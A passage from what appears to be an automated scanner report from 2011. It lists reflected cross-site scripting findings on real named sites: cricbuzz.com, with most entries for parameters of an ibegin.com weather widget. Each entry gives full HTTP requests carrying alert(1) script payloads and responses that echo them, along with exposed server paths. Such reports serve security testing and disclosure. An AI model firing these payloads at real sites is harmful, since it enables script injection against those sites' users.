User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:37:46 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:37:46 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=XYNLIASLF0LPVB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601953; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=19f0450799003a67ffb066dd0f0d8e8b; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 -->
...[SNIP]...

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5743<script>alert(1)</script>01a55c78f8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5743<script>alert(1)</script>01a55c78f8d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:27 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15660
X-Varnish: 542435555
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<strong> Unable to resolve the request "favicon.icoa5743<script>alert(1)</script>01a55c78f8d".</strong>
...[SNIP]...

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the background_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69b10%3balert(1)//368093ffe90 was submitted in the background_color parameter. This input was echoed as 69b10;alert(1)//368093ffe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff69b10%3balert(1)//368093ffe90&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff69b10;alert(1)//368093ffe90-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="backgrou
...[SNIP]...

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8f80%3balert(1)//21c5509fcb6 was submitted in the border_color parameter. This input was echoed as c8f80;alert(1)//21c5509fcb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000c8f80%3balert(1)//21c5509fcb6&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000c8f80;alert(1)//21c5509fcb6-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; colo
...[SNIP]...

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 285e6%3balert(1)//e4c184846bc was submitted in the border_width parameter. This input was echoed as 285e6;alert(1)//e4c184846bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1285e6%3balert(1)//e4c184846bc&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1285e6;alert(1)//e4c184846bc-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fffff
...[SNIP]...

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the city request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f10bd%3balert(1)//60cfe65333b was submitted in the city parameter. This input was echoed as f10bd;alert(1)//60cfe65333b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Restonf10bd%3balert(1)//60cfe65333b&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-restonf10bd;alert(1)//60cfe65333b-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div st
...[SNIP]...

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2dbae%3balert(1)//5b07d7be905 was submitted in the color parameter. This input was echoed as 2dbae;alert(1)//5b07d7be905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=0000002dbae%3balert(1)//5b07d7be905&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-0000002dbae;alert(1)//5b07d7be905-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-colo
...[SNIP]...

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the country request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31206%3balert(1)//199a4fe5d1a was submitted in the country parameter. This input was echoed as 31206;alert(1)//199a4fe5d1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us31206%3balert(1)//199a4fe5d1a&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us31206;alert(1)//199a4fe5d1a-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

documen
...[SNIP]...

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the current request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf0d4%3balert(1)//11ce2c9a945 was submitted in the current parameter. This input was echoed as bf0d4;alert(1)//11ce2c9a945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1bf0d4%3balert(1)//11ce2c9a945&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1bf0d4;alert(1)//11ce2c9a945-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style=
...[SNIP]...

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_family request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 33d1e%3balert(1)//6ffbaad9015 was submitted in the font_family parameter. This input was echoed as 33d1e;alert(1)//6ffbaad9015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana33d1e%3balert(1)//6ffbaad9015&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
tice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana33d1e;alert(1)//6ffbaad9015-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000;
...[SNIP]...

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_size request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5e6df%3balert(1)//029aa189bd3 was submitted in the font_size parameter. This input was echoed as 5e6df;alert(1)//029aa189bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=115e6df%3balert(1)//029aa189bd3&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-115e6df;alert(1)//029aa189bd3-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color:
...[SNIP]...

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the forecast request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fc4a7%3balert(1)//f9c3e7421 was submitted in the forecast parameter. This input was echoed as fc4a7;alert(1)//f9c3e7421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1fc4a7%3balert(1)//f9c3e7421&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1558


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1fc4a7;alert(1)//f9c3e7421-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="b
...[SNIP]...

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the padding request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3993a%3balert(1)//19a959291cc was submitted in the padding parameter. This input was echoed as 3993a;alert(1)//19a959291cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=103993a%3balert(1)//19a959291cc&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-103993a;alert(1)//19a959291cc-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fff
...[SNIP]...

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the showicons request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3eb8b%3balert(1)//795fc0174d6 was submitted in the showicons parameter. This input was echoed as 3eb8b;alert(1)//795fc0174d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=13eb8b%3balert(1)//795fc0174d6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
ce: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-13eb8b;alert(1)//795fc0174d6-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000; w
...[SNIP]...

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the smallicon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7f9f8%3balert(1)//d9661db8ae5 was submitted in the smallicon parameter. This input was echoed as 7f9f8;alert(1)//d9661db8ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=17f9f8%3balert(1)//d9661db8ae5&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-17f9f8;alert(1)//d9661db8ae5-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div styl
...[SNIP]...

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the state request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d844%3balert(1)//2cee12dca9c was submitted in the state parameter. This input was echoed as 6d844;alert(1)//2cee12dca9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia6d844%3balert(1)//2cee12dca9c&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
